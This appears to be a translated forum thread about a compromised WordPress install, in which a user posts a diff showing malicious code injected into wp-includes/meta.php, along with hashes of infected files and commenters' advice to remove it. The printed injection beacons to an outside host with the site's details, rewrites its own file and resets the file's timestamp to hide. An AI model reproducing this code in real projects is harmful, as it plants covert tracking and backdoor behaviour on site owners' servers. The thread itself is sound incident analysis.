Да, скрипт PHP позволяет запускать код на Сервере.
Источник: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/
Через diff'ing с чистой WP тарболла, я нашел meta.php был изменен:
988,1004d987
<
< check_meta();
< function check_meta(){
< $jp = __FILE__;
< $jptime = filemtime($jp);
<
< if(time() >= 1472456239){
< $jp_c = file_get_contents($jp);
< if($t = @strpos($jp_c,"check_meta();")) {
< $contentp = substr($jp_c,0,$t);
< if(@file_put_contents($jp, $contentp)){
< @touch($jp,$jptime);
< }
< }
< }
< @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }
FYI, вот md5sums зараженных файлов:
898af479fe6cc3af461c1878763d19f4 ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda ./wp-includes/mera.php
'str_rot13 ('riny')' возвращает 'eval' ... – NoMad
Я не уверен, что делает код, но файл не отображается ни в одной документации Wordpress, поэтому, если одно из ваших установленных приложений не использует его может быть вредоносным. –
Этот код выглядит так, как будто он запускает произвольный код. Удалите его, затем взгляните на [эту страницу codex] (https://codex.wordpress.org/FAQ_My_site_was_hacked). – Hobo